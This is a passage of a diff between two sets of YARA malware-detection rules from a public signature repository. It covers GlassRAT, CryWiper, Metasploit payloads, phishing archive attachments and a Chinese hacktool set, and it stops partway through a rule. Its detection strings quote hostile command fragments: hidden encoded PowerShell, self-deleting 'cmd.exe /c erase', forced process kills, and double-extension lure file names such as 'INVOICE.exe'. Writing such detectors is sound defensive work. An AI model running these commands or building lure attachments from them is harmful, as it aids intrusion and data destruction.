-		id = "d7a7e57a-b117-5da8-a7a2-4c6351bd9072"
-		date = "2016-08-08"
+		description = "Detects GlassRAT by RSA (modified by Florian Roth - speed improvements)"
+		author = "RSA RESEARCH"
+		id = "7739d1f6-f16d-5599-9388-a1d89dbeb355"
+		date = "2015-11-03"
 		modified = "2023-12-05"
-		reference = "http://www.symantec.com/connect/blogs/strider-cyberespionage-group-turns-eye-sauron-targets"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_strider.yara#L8-L20"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_glassRAT.yar#L8-L43"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1cfc43ab15b3d220a636c150315c30f5654e53fad67d20534ce4d5c00295e35e"
-		score = 80
+		logic_hash = "939d2cb11ff414641f68b2913fe8d24458e1fd7ba450b8781072bb10da3ad039"
+		score = 75
 		quality = 85
 		tags = ""
+		Info = "GlassRat"
 
 	strings:
-		$code = { 31 06 83 C6 04 D1 E8 73 05 35 01 00 00 D0 E2 F0 }
+		$bin1 = {85 C0 B3 01}
+		$bin3 = {68 4C 50 00 10}
+		$bin4 = {68 48 50 00 10}
+		$bin5 = {68 44 50 00 10}
+		$hs = {CB FF 5D C9 AD 3F 5B A1 54 13 FE FB 05 C6 22}
+		$s1 = "pwlfnn10,gzg"
+		$s2 = "AddNum"
+		$s3 = "ServiceMain"
+		$s4 = "The Window"
+		$s5 = "off.dat"
 
 	condition:
-		all of them
+		all of ( $bin* ) and $hs and 3 of ( $s* )
 }
-rule SIGNATURE_BASE_Remsec_Executable_Blob_64
+rule SIGNATURE_BASE_Glassrat_Generic : FILE
 {
 	meta:
-		description = "Detects malware from Symantec's Strider APT report"
-		author = "Symantec"
-		id = "22345f40-3dae-5d5b-acc6-c67394475636"
-		date = "2016-08-08"
+		description = "Detects GlassRAT Malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "d09c4a9f-15ad-56d7-b015-94f494420e98"
+		date = "2015-11-23"
 		modified = "2023-12-05"
-		reference = "http://www.symantec.com/connect/blogs/strider-cyberespionage-group-turns-eye-sauron-targets"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_strider.yara#L22-L34"
+		reference = "https://blogs.rsa.com/peering-into-glassrat/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_glassRAT.yar#L45-L72"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "957e5b6afabec3fb1b169dd85d0e950107e219f7dec8ef779a18bd90d9824a97"
+		logic_hash = "fdd309c403e53bfa80340c1334f90fd5ef5f4618737b19069a07f7aa63aeb23d"
 		score = 80
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "30d26aebcee21e4811ff3a44a7198a5c519843a24f334880384a7158e07ae399"
+		hash2 = "3bdeb3805e9230361fb93c6ffb0bfec8d3aee9455d95b2428c7f6292d387d3a4"
+		hash3 = "79993f1912958078c4d98503e00dc526eb1d0ca4d020d17b010efa6c515ca92e"
+		hash4 = "a9b30b928ebf9cda5136ee37053fa045f3a53d0706dcb2343c91013193de761e"
+		hash5 = "c11faf7290299bb13925e46d040ed59ab3ca8938eab1f171aa452603602155cb"
+		hash6 = "d95fa58a81ab2d90a8cbe05165c00f9c8ad5b4f49e98df2ad391f5586893490d"
+		hash7 = "f1209eb95ce1319af61f371c7f27bf6846eb90f8fd19e8d84110ebaf4744b6ea"
 
 	strings:
-		$code = { 31 06 48 83 C6 04 D1 E8 73 05 35 01 00 00 D0 E2 EF }
+		$s1 = "cmd.exe /c %s" fullword ascii
+		$s2 = "update.dll" fullword ascii
+		$s3 = "SYSTEM\\CurrentControlSet\\Services\\RasAuto\\Parameters" fullword ascii
+		$s4 = "%%temp%%\\%u" fullword ascii
+		$s5 = "\\off.dat" ascii
+		$s6 = "rundll32 \"%s\",AddNum" fullword ascii
+		$s7 = "cmd.exe /c erase /F \"%s\"" fullword ascii
+		$s8 = "SYSTEM\\ControlSet00%d\\Services\\RasAuto" fullword ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 15MB and 5 of them
 }
-rule SIGNATURE_BASE_Remsec_Executable_Blob_Parser
+rule SIGNATURE_BASE_SUSP_ZIP_LNK_Phishattachment_Pattern_Jun22_1 : FILE
 {
 	meta:
-		description = "Detects malware from Symantec's Strider APT report"
-		author = "Symantec"
-		id = "b2189bfe-7b84-5fe9-8829-64f49d1e2030"
-		date = "2016-08-08"
+		description = "Detects suspicious tiny ZIP files with phishing attachment characteristics"
+		author = "Florian Roth (Nextron Systems)"
+		id = "3537c4ea-a51d-5100-97d7-71a24da5ff43"
+		date = "2022-06-23"
 		modified = "2023-12-05"
-		reference = "http://www.symantec.com/connect/blogs/strider-cyberespionage-group-turns-eye-sauron-targets"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_strider.yara#L36-L48"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_phish_attachments.yar#L2-L21"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "2f6db962807c07ff1bbe8b53eeb386d7b0ac88f95b76439c0d8b65d597739bdd"
-		score = 80
+		logic_hash = "2ff398379e3d8112991eeacd99bf9d3bafbf3e9266f012d2539d6b2661d5969e"
+		score = 65
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		hash1 = "4edb41f4645924d8a73e7ac3e3f39f4db73e38f356bc994ad7d03728cd799a48"
+		hash2 = "c4fec375b44efad2d45c49f30133efbf6921ce82dbb2d1a980f69ea6383b0ab4"
+		hash3 = "9c70eeac97374213355ea8fa019a0e99e0e57c8efc43daa3509f9f98fa71c8e4"
+		hash4 = "ddc20266e38a974a28af321ab82eedaaf51168fbcc63ac77883d8be5200dcaf9"
+		hash5 = "b59788ae984d9e70b4f7f5a035b10e6537063f15a010652edd170fc6a7e1ea2f"
 
 	strings:
-		$code = { ( 0F 82 ?? ?? 00 00 | 72 ?? ) ( 80 | 41 80 ) ( 7? | 7C 24 ) 04 02 ( 0F 85 ?? ?? 00 00 | 75 ?? ) ( 81 | 41 81 ) ( 3? | 3C 24 | 7D 00 ) 02 AA 02 C1 ( 0F 85 ?? ?? 00 00 | 75 ?? ) ( 8B | 41 8B | 44 8B | 45 8B ) ( 4? | 5? | 6? | 7? | ?4 24 | ?C 24 ) 06 }
+		$sl1 = ".lnk"
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x4b50 and filesize < 2KB and $sl1 in ( filesize -256 .. filesize )
 }
-rule SIGNATURE_BASE_Remsec_Encrypted_Api
+rule SIGNATURE_BASE_SUSP_ZIP_ISO_Phishattachment_Pattern_Jun22_1 : FILE
 {
 	meta:
-		description = "Detects malware from Symantec's Strider APT report"
-		author = "Symantec"
-		id = "1aa3380b-d704-5eb9-b25d-f4bf20ae7179"
-		date = "2016-08-08"
+		description = "Detects suspicious small base64 encoded ZIP files (MIME email attachments) with .iso files as content as often used in phishing attacks"
+		author = "Florian Roth (Nextron Systems)"
+		id = "638541a6-d2d4-513e-978c-9d1b9f5e3b71"
+		date = "2022-06-23"
 		modified = "2023-12-05"
-		reference = "http://www.symantec.com/connect/blogs/strider-cyberespionage-group-turns-eye-sauron-targets"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_strider.yara#L50-L62"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_phish_attachments.yar#L23-L41"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "4f10c24a8480c17c2939fe3fecba2820b22f8a47bc2b2e73ac1080a355025d7c"
-		score = 80
+		logic_hash = "21de56d6209050b429c0cce82fd334d1b38a2a3727db5ead06f36fa9d503e193"
+		score = 65
 		quality = 85
-		tags = ""
+		tags = "FILE"
 
 	strings:
-		$open_process = { 91 9A 8F B0 9C 90 8D AF 8C 8C 9A FF }
+		$pkzip_base64_1 = { 0A 55 45 73 44 42 }
+		$pkzip_base64_2 = { 0A 55 45 73 44 42 }
+		$pkzip_base64_3 = { 0A 55 45 73 48 43 }
+		$iso_1 = "Lmlzb1BL"
+		$iso_2 = "5pc29QS"
+		$iso_3 = "uaXNvUE"
 
 	condition:
-		all of them
+		filesize < 2000KB and 1 of ( $pk* ) and 1 of ( $iso* )
 }
-rule SIGNATURE_BASE_Remsec_Packer_A
+rule SIGNATURE_BASE_SUSP_Archive_Phishing_Attachment_Characteristics_Jun22_1 : FILE
 {
 	meta:
-		description = "Detects malware from Symantec's Strider APT report"
-		author = "Symantec"
-		id = "d75198ab-b1ea-572a-a674-9a38c3e2958b"
-		date = "2016-08-08"
+		description = "Detects characteristics of suspicious file names or double extensions often found in phishing mail attachments"
+		author = "Florian Roth (Nextron Systems)"
+		id = "3cb8c371-f40b-5773-84d1-3bce37da529e"
+		date = "2022-06-29"
 		modified = "2023-12-05"
-		reference = "http://www.symantec.com/connect/blogs/strider-cyberespionage-group-turns-eye-sauron-targets"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_strider.yara#L64-L76"
+		reference = "https://twitter.com/0xtoxin/status/1540524891623014400?s=12&t=IQ0OgChk8tAIdTHaPxh0Vg"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_phish_attachments.yar#L43-L141"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b46a41686fbf1c63e8a8b583859f23bf789bc9f11ee6b1fb01bb08e602772e76"
-		score = 80
-		quality = 85
-		tags = ""
+		logic_hash = "647044fa3b5cf6f0e9e738fa7b7d24f8918b7a7fb359342e1314d97b50debf87"
+		score = 65
+		quality = 60
+		tags = "FILE"
+		hash1 = "caaa5c5733fca95804fffe70af82ee505a8ca2991e4cc05bc97a022e5f5b331c"
+		hash2 = "a746d8c41609a70ce10bc69d459f9abb42957cc9626f2e83810c1af412cb8729"
 
 	strings:
-		$code = { 69 ( C? | D? | E? | F? ) AB 00 00 00 ( 81 | 41 81 ) C? CD 2B 00 00 ( F7 | 41 F7 ) E? ( C1 | 41 C1 ) E? 0D ( 69 | 45 69 ) ( C? | D? | E? | F? ) 85 CF 00 00 ( 29 | 41 29 | 44 29 | 45 29 | 2B | 41 2B | 44 2B | 45 2B ) }
+		$sa01 = "INVOICE.exePK" ascii
+		$sa02 = "PAYMENT.exePK" ascii
+		$sa03 = "REQUEST.exePK" ascii
+		$sa04 = "ORDER.exePK" ascii
+		$sa05 = "invoice.exePK" ascii
+		$sa06 = "payment.exePK" ascii
+		$sa07 = "_request.exePK" ascii
+		$sa08 = "_order.exePK" ascii
+		$sa09 = "-request.exePK" ascii
+		$sa10 = "-order.exePK" ascii
+		$sa11 = " request.exePK" ascii
+		$sa12 = " order.exePK" ascii
+		$sa14 = ".doc.exePK" ascii
+		$sa15 = ".docx.exePK" ascii
+		$sa16 = ".xls.exePK" ascii
+		$sa17 = ".xlsx.exePK" ascii
+		$sa18 = ".pdf.exePK" ascii
+		$sa19 = ".ppt.exePK" ascii
+		$sa20 = ".pptx.exePK" ascii
+		$sa21 = ".rtf.exePK" ascii
+		$sa22 = ".txt.exePK" ascii
+		$sb01 = "SU5WT0lDRS5leGVQS"
+		$sb02 = "lOVk9JQ0UuZXhlUE"
+		$sb03 = "JTlZPSUNFLmV4ZVBL"
+		$sb04 = "UEFZTUVOVC5leGVQS"
+		$sb05 = "BBWU1FTlQuZXhlUE"
+		$sb06 = "QQVlNRU5ULmV4ZVBL"
+		$sb07 = "UkVRVUVTVC5leGVQS"
+		$sb08 = "JFUVVFU1QuZXhlUE"
+		$sb09 = "SRVFVRVNULmV4ZVBL"
+		$sb10 = "T1JERVIuZXhlUE"
+		$sb11 = "9SREVSLmV4ZVBL"
+		$sb12 = "PUkRFUi5leGVQS"
+		$sb13 = "aW52b2ljZS5leGVQS"
+		$sb14 = "ludm9pY2UuZXhlUE"
+		$sb15 = "pbnZvaWNlLmV4ZVBL"
+		$sb16 = "cGF5bWVudC5leGVQS"
+		$sb17 = "BheW1lbnQuZXhlUE"
+		$sb18 = "wYXltZW50LmV4ZVBL"
+		$sb19 = "X3JlcXVlc3QuZXhlUE"
+		$sb20 = "9yZXF1ZXN0LmV4ZVBL"
+		$sb21 = "fcmVxdWVzdC5leGVQS"
+		$sb22 = "X29yZGVyLmV4ZVBL"
+		$sb23 = "9vcmRlci5leGVQS"
+		$sb24 = "fb3JkZXIuZXhlUE"
+		$sb25 = "LXJlcXVlc3QuZXhlUE"
+		$sb26 = "1yZXF1ZXN0LmV4ZVBL"
+		$sb27 = "tcmVxdWVzdC5leGVQS"
+		$sb28 = "LW9yZGVyLmV4ZVBL"
+		$sb29 = "1vcmRlci5leGVQS"
+		$sb30 = "tb3JkZXIuZXhlUE"
+		$sb31 = "IHJlcXVlc3QuZXhlUE"
+		$sb32 = "ByZXF1ZXN0LmV4ZVBL"
+		$sb33 = "gcmVxdWVzdC5leGVQS"
+		$sb34 = "IG9yZGVyLmV4ZVBL"
+		$sb35 = "BvcmRlci5leGVQS"
+		$sb36 = "gb3JkZXIuZXhlUE"
+		$sb37 = "LmRvYy5leGVQS"
+		$sb38 = "5kb2MuZXhlUE"
+		$sb39 = "uZG9jLmV4ZVBL"
+		$sb40 = "LmRvY3guZXhlUE"
+		$sb41 = "5kb2N4LmV4ZVBL"
+		$sb42 = "uZG9jeC5leGVQS"
+		$sb43 = "Lnhscy5leGVQS"
+		$sb44 = "54bHMuZXhlUE"
+		$sb45 = "ueGxzLmV4ZVBL"
+		$sb46 = "Lnhsc3guZXhlUE"
+		$sb47 = "54bHN4LmV4ZVBL"
+		$sb48 = "ueGxzeC5leGVQS"
+		$sb49 = "LnBkZi5leGVQS"
+		$sb50 = "5wZGYuZXhlUE"
+		$sb51 = "ucGRmLmV4ZVBL"
+		$sb52 = "LnBwdC5leGVQS"
+		$sb53 = "5wcHQuZXhlUE"
+		$sb54 = "ucHB0LmV4ZVBL"
+		$sb55 = "LnBwdHguZXhlUE"
+		$sb56 = "5wcHR4LmV4ZVBL"
+		$sb57 = "ucHB0eC5leGVQS"
+		$sb58 = "LnJ0Zi5leGVQS"
+		$sb59 = "5ydGYuZXhlUE"
+		$sb60 = "ucnRmLmV4ZVBL"
+		$sb61 = "LnR4dC5leGVQS"
+		$sb62 = "50eHQuZXhlUE"
+		$sb63 = "udHh0LmV4ZVBL"
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x4b50 and 1 of ( $sa* ) or 1 of ( $sb* )
 }
-rule SIGNATURE_BASE_Remsec_Packer_B
+rule SIGNATURE_BASE_CN_Tools_Xbat : FILE
 {
 	meta:
-		description = "Detects malware from Symantec's Strider APT report"
-		author = "Symantec"
-		id = "18e7f84e-27f2-532d-9ead-0db6e9e6c0b2"
-		date = "2016-08-08"
+		description = "Chinese Hacktool Set - file xbat.vbs"
+		author = "Florian Roth (Nextron Systems)"
+		id = "5b2f0d2e-a7fb-5f5a-94a9-28e851c9756e"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "http://www.symantec.com/connect/blogs/strider-cyberespionage-group-turns-eye-sauron-targets"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_strider.yara#L78-L90"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktool_scripts.yar#L10-L24"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9c63b5934d60b59a33364ef56c913220e59b9798a682a7f97e6755270adf4e4b"
-		score = 80
+		hash = "a7005acda381a09803b860f04d4cae3fdb65d594"
+		logic_hash = "c6dae76bbda7b43eef348c61e1330405923baf724f1aa5d2b51132dde89248fe"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$code = { 48 8B 05 ?? ?? ?? ?? 48 89 44 24 ?? 48 8B 05 ?? ?? ?? ?? 48 8D 4C 24 ?? 48 89 44 24 ?? 48 8D ( 45 ?? | 84 24 ?? ?? 00 00 ) ( 44 88 6? 24 ?? | C6 44 24 ?? 00 ) 48 89 44 24 ?? 48 8D ( 45 ?? | 84 24 ?? ?? 00 00 ) C7 44 24 ?? 0? 00 00 00 2B ?8 48 89 ?C 24 ?? 44 89 6? 24 ?? 83 C? 08 89 ?C 24 ?? ( FF | 41 FF ) D? ( 05 | 8D 88 ) 00 00 00 3A }
+		$s0 = "ws.run \"srss.bat /start\",0 " fullword ascii
+		$s1 = "Set ws = Wscript.CreateObject(\"Wscript.Shell\")" fullword ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x6553 and filesize < 0KB and all of them
 }
-rule SIGNATURE_BASE_PUP_Computraceagent : FILE
+rule SIGNATURE_BASE_CN_Tools_Temp : FILE
 {
 	meta:
-		description = "Absolute Computrace Agent Executable"
-		author = "ASERT - Arbor Networks (slightly modified by Florian Roth)"
-		id = "676f8f1e-a3b4-5d05-b13b-bd6cb0aabbbd"
-		date = "2018-05-01"
+		description = "Chinese Hacktool Set - file Temp.war"
+		author = "Florian Roth (Nextron Systems)"
+		id = "4fbaabd0-fbf2-56a0-94af-9deba1e7cc81"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "https://asert.arbornetworks.com/lojack-becomes-a-double-agent/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fancybear_computrace_agent.yar#L1-L14"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktool_scripts.yar#L26-L42"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "65e964e68be1e286ab3aa39677e250cf5994a7a08d0f6db286c0260cf77d6c48"
+		hash = "c3327ef63b0ed64c4906e9940ef877c76ebaff58"
+		logic_hash = "05fd1cb3f7c8b96ccf824013c130a0b21f43724463f8658e23239d009be7f4fe"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a = { D1 E0 F5 8B 4D 0C 83 D1 00 8B EC FF 33 83 C3 04 }
-		$b1 = { 72 70 63 6E 65 74 70 2E 65 78 65 00 72 70 63 6E 65 74 70 00 }
-		$b2 = { 54 61 67 49 64 00 }
+		$s0 = "META-INF/context.xml<?xml version=\"1.0\" encoding=\"UTF-8\"?>" fullword ascii
+		$s1 = "browser.jsp" fullword ascii
+		$s3 = "cmd.jsp" fullword ascii
+		$s4 = "index.jsp" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 40KB and ( $a or ( $b1 and $b2 ) )
+		uint16( 0 ) == 0x4b50 and filesize < 203KB and all of them
 }
-rule SIGNATURE_BASE_APT_Crywiper_Dec22
+rule SIGNATURE_BASE_CN_Tools_Srss : FILE
 {
 	meta:
-		description = "Detects CryWiper malware samples"
+		description = "Chinese Hacktool Set - file srss.bat"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d56ccf4e-30ba-5308-ad68-ffc2ae5a1718"
-		date = "2022-12-05"
+		id = "13191e2e-fbcd-5e0b-af55-cc10f2583c1b"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "https://securelist-ru.translate.goog/novyj-troyanec-crywiper/106114/?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ru_crywiper.yar#L2-L19"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktool_scripts.yar#L44-L58"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7c22e02ed996cd820ed87a0c5d50e3264629cdd887aad4ea466cadeccaee2b2f"
+		hash = "092ab0797947692a247fe80b100fb4df0f9c37a0"
+		logic_hash = "e01fd60adc32be26b0940ecc127a17bfcfe2ebfcf6cefea76ba6adc61d3c18d4"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "Software\\Sysinternals\\BrowserUpdate"
-		$sx1 = "taskkill.exe /f /im MSExchange*"
-		$s1 = "SYSTEM\\CurrentControlSet\\Control\\Terminal Server" ascii
-		$s2 = "fDenyTSConnections" ascii
+		$s0 = "srss.exe -idx 0 -ip"
+		$s1 = "-port 21 -logfilter \"_USER ,_P" ascii
 
 	condition:
-		1 of ( $x* ) or all of ( $s* )
+		filesize < 100 and all of them
 }
-rule SIGNATURE_BASE_Msfpayloads_Msf : FILE
+rule SIGNATURE_BASE_Dll_Unreg : FILE
 {
 	meta:
-		description = "Metasploit Payloads - file msf.sh"
+		description = "Chinese Hacktool Set - file UnReg.bat"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c56dbb8e-1e03-5112-b2ef-a0adfd14dffa"
-		date = "2017-02-09"
-		modified = "2022-08-18"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_metasploit_payloads.yar#L10-L23"
+		id = "5c14486d-72a2-5a18-9db0-ce0ab61fdce7"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktool_scripts.yar#L60-L74"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "4f0eab53a135242c7891b8c88e937a854c945a10000ca4cbf7b21f4596dca410"
+		hash = "d5e24ba86781c332d0c99dea62f42b14e893d17e"
+		logic_hash = "0e534e475a5b4338aa53bea09325dd63a3d451a13b46a70b5208cabd2deecabe"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "320a01ec4e023fb5fbbaef963a2b57229e4f918847e5a49c7a3f631cb556e96c"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "export buf=\\" ascii
+		$s0 = "regsvr32.exe /u C:\\windows\\system32\\PacketX.dll" fullword ascii
+		$s1 = "del /F /Q C:\\windows\\system32\\PacketX.dll" fullword ascii
 
 	condition:
-		filesize < 5MB and $s1
+		filesize < 1KB and 1 of them
 }
-rule SIGNATURE_BASE_Msfpayloads_Msf_2
+rule SIGNATURE_BASE_Dll_Reg : FILE
 {
 	meta:
-		description = "Metasploit Payloads - file msf.asp"
+		description = "Chinese Hacktool Set - file Reg.bat"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ec1ae1b6-18a3-5590-ae15-1e2b362c545a"
-		date = "2017-02-09"
+		id = "97c0d9ff-6a12-57e3-8219-6c1843a03a29"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_metasploit_payloads.yar#L25-L40"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktool_scripts.yar#L76-L90"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8f803a5d71a084e1ea453638bdeaa2dd590a1912be652b74b065d9afd332ffa2"
+		hash = "cb8a92fe256a3e5b869f9564ecd1aa9c5c886e3f"
+		logic_hash = "db2032d5689f9fcfc446d5ebe8a6d28c6dbd8bcd1d93769ec969d76f8add4f9d"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "e52f98466b92ee9629d564453af6f27bd3645e00a9e2da518f5a64a33ccf8eb5"
 
 	strings:
-		$s1 = "& \"\\\" & \"svchost.exe\"" fullword ascii
-		$s2 = "CreateObject(\"Wscript.Shell\")" fullword ascii
-		$s3 = "<% @language=\"VBScript\" %>" fullword ascii
+		$s0 = "copy PacketX.dll C:\\windows\\system32\\PacketX.dll" fullword ascii
+		$s1 = "regsvr32.exe C:\\windows\\system32\\PacketX.dll" fullword ascii
 
 	condition:
-		all of them
+		filesize < 1KB and all of them
 }
-rule SIGNATURE_BASE_Msfpayloads_Msf_Psh
+rule SIGNATURE_BASE_Sbin_Squid : FILE
 {
 	meta:
-		description = "Metasploit Payloads - file msf-psh.vba"
+		description = "Chinese Hacktool Set - file squid.bat"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5b760f03-b0f8-5871-bd34-e7e44443530c"
-		date = "2017-02-09"
+		id = "e7302e90-d072-599b-a8f2-bf1f21a84de9"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_metasploit_payloads.yar#L42-L57"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktool_scripts.yar#L92-L108"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "2e6015e8c91ccd8647e78220d10c2d704867369d962b734bb4522a1213be2f2d"
+		hash = "8b795a8085c3e6f3d764ebcfe6d59e26fdb91969"
+		logic_hash = "c440bcfda55f926354ea5e462fe1e6a0e9e9585bb1c1539c0aa0588405a46105"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "5cc6c7f1aa75df8979be4a16e36cece40340c6e192ce527771bdd6463253e46f"
 
 	strings:
-		$s1 = "powershell.exe -nop -w hidden -e" ascii
-		$s2 = "Call Shell(" ascii
-		$s3 = "Sub Workbook_Open()" fullword ascii
+		$s0 = "del /s /f /q" fullword ascii
+		$s1 = "squid.exe -z" fullword ascii
+		$s2 = "net start Squid" fullword ascii
+		$s3 = "net stop Squid" fullword ascii
 
 	condition:
-		all of them
+		filesize < 1KB and all of them
 }
-rule SIGNATURE_BASE_Msfpayloads_Msf_Exe
+rule SIGNATURE_BASE_Sql1433_Creck : FILE
 {
 	meta:
-		description = "Metasploit Payloads - file msf-exe.vba"
+		description = "Chinese Hacktool Set - file creck.bat"
 		author = "Florian Roth (Nextron Systems)"
-		id = "fd07240e-0ee0-5318-a436-d97054e92414"
-		date = "2017-02-09"
+		id = "38a91464-d493-5154-86ec-e54b3e25309b"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_metasploit_payloads.yar#L59-L77"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktool_scripts.yar#L110-L125"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3baa242e90dd845e022785101ebc2d5c0d84007d20aef6a2bb6a9a8c6280d4eb"
+		hash = "189c11a3b268789a3fbcfac3bd4e03cbfde87b1d"
+		logic_hash = "2d9ff5f130d625450e7de41832695839f0427a6186569280a224f20e89fe1d8a"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "321537007ea5052a43ffa46a6976075cee6a4902af0c98b9fd711b9f572c20fd"
 
 	strings:
-		$s1 = "'* PAYLOAD DATA" fullword ascii
-		$s2 = " = Shell(" ascii
-		$s3 = "= Environ(\"USERPROFILE\")" fullword ascii
-		$s4 = "'**************************************************************" fullword ascii
-		$s5 = "ChDir (" ascii
-		$s6 = "'* MACRO CODE" fullword ascii
+		$s0 = "start anhao3.exe -i S.txt -p  pass3.txt -o anhao.txt -l Them.txt -t 1000" fullword ascii
